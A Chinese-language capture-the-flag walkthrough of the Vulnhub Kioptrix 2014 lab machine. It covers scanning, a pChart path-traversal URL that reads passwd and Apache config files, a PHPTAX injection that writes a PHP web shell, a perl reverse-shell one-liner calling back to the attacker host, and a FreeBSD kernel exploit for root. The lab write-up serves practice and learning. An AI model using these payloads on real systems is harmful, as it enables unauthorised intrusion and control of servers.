当前位置: 首页 > news >正文

Vulnhub靶机:Kioptrix_2014

一、介绍

运行环境:Virtualbox和vmware

攻击机:kali(192.168.56.101)

靶机:Kioptrix: 2014(192.168.56.108)

目标:获取靶机root权限和flag

靶机下载地址:https://www.vulnhub.com/entry/kioptrix-2014-5,62/

二、信息收集

靶机下载下来之后,直接运行使用nmap扫描检测不到IP地址

需要删除靶机原来的网卡,再重新添加网卡上去。

在这里插入图片描述

使用nmap主机发现靶机ip:192.168.56.108

在这里插入图片描述

使用nmap端口扫描发现靶机开放端口:22、80、8080

nmap -A 192.168.56.108 -p 1-65535

在这里插入图片描述

打开网站该网站是一个静态页面,查看源码发现隐藏信息:URL=pChart2.1.3/index.php

在这里插入图片描述

访问pChart2.1.3/index.php,该页面CMS为pChart2.1.3

在这里插入图片描述

使用searchsploit搜索pChart2.1.3的历史漏洞,并将找到的结果导出、查看

在这里插入图片描述

发现一个任意文件读取漏洞

/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

在这里插入图片描述

浏览器访问,验证该漏洞

在这里插入图片描述

三、漏洞利用

在 FreeBSD 中,Apache HTTP 服务器的主配置文件安装为 /usr/local/etc/apache2x/httpd.conf,其中 x 表示版本号。

参考:https://fiercex.github.io/FreeBSD_Handbook_d2l/di-32-zhang-wang-luo-fu-wu-qi/32.8.-apache-http-fu-wu-qi.html

根据nmap扫描结果apache的版本为2.2.21,所以访问:http://192.168.56.108/pChart2.1.3/examples/index.php?Action=View&Script=/usr/local/etc/apache22/httpd.conf,查看靶机apache的配置文件,在文件发现配置,访问8080端口需要User-AgentMozilla/4.0

在这里插入图片描述

访问8080端口,禁止访问

在这里插入图片描述

我们User-Agent设置为Mozilla/4.0,发现一个目录phptax/

在这里插入图片描述

访问该目录,可以看到该网站CMS为PHPTAX

在这里插入图片描述

使用searchsploit搜索PHPTAX的历史漏洞,发现命令执行漏洞

在这里插入图片描述

将这几个exp导出,都尝试一下,查看25849.txt,里面有一个php的exp,加入设置User-Agent的代码,尝试执行发现报错。

直接查看php的exp源码,该exp访问两个url,来命令执行

访问http://192.168.56.108:8080/phptax/index.php?field=rce.php&newvalue=%3C%3Fphp%20passthru(%24_GET%5Bcmd%5D)%3B%3F%3E将命令执行代码写入rce.php

在这里插入图片描述

访问http://192.168.56.108:8080/phptax/data/rce.php?cmd=id执行id命令

在这里插入图片描述

使用perl反弹shell成功:http://192.168.56.108:8080/phptax/data/rce.php?cmd=perl%20-e%20'use%20Socket%3B%24i%3D%22192.168.56.101%22%3B%24p%3D4444%3Bsocket(S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname(%22tcp%22))%3Bif(connect(S%2Csockaddr_in(%24p%2Cinet_aton(%24i))))%7Bopen(STDIN%2C%22%3E%26S%22)%3Bopen(STDOUT%2C%22%3E%26S%22)%3Bopen(STDERR%2C%22%3E%26S%22)%3Bexec(%22%2Fbin%2Fsh%20-i%22)%3B%7D%3B'

在这里插入图片描述

四、提权

使用命令uname -a查看系统的内核版本,为FreeBSD 9.0-RELEASE

在这里插入图片描述

使用searchsploit搜索该版本的历史漏洞

searchsploit FreeBSD 9.0

在这里插入图片描述

选用26368.c,使用web服务上传exp到靶机,但发现靶机没有wget命令

使用echo '''exp code''' > exp.c命令将exp代码写入靶机

在这里插入图片描述
在这里插入图片描述

将exp.c编译执行,得到root权限

在这里插入图片描述

参考链接:https://www.freebuf.com/column/211565.html

http://www.lryc.cn/news/322508.html

相关文章:

  • Spring Boot整合Spring Security
  • Rust字符串深入理解
  • TSINGSEE青犀AI智能分析网关V4酿酒厂安全挂网AI检测算法
  • LeetCode第126场双周赛个人题解
  • 牛客NC403 编辑距离为一【中等 模拟法 Java,Go,PHP】
  • C# SetWindowPos函数
  • zookeeper快速入门五:用zookeeper实现服务注册与发现中心
  • Java 中 BitSet 类的用法
  • Jenkins-pipeline流水线构建完钉钉通知
  • 汽车制造业供应商管理会面临哪些问题?要如何解决?
  • day28|93. 复原 IP 地址|Leetcode 78. 子集|90.子集II
  • 怎样提升小程序日活?签到抽奖可行吗?
  • hive语法树分析,判断 sql语句中有没有select *
  • 【论文阅读】MSGNet:学习多变量时间序列预测中的多尺度间序列相关性
  • 智慧城市与数字孪生:共创未来城市的智慧生活
  • 【Ubuntu】FTP站点搭建
  • RK3228H is the same SoC as rk3328.
  • Golang 开发实战day04 - Standard Library
  • 程序员排查BUG指南
  • 【Vue】elementUI-MessageBox组件相关
  • 数据库运行状况和性能监控工具
  • CTF-辨别细菌
  • RuoYi-Vue开源项目2-前端登录验证码生成过程分析
  • error: C preprocessor fails sanity check
  • Kubernetes实战(三十一)-安装containerd
  • 使用docker搭建faiss向量数据库
  • 安卓面试题多线程 121-125
  • 什么是 HTTPS?它是如何解决安全性问题的?
  • C++入门(下)
  • 2024-03-20 作业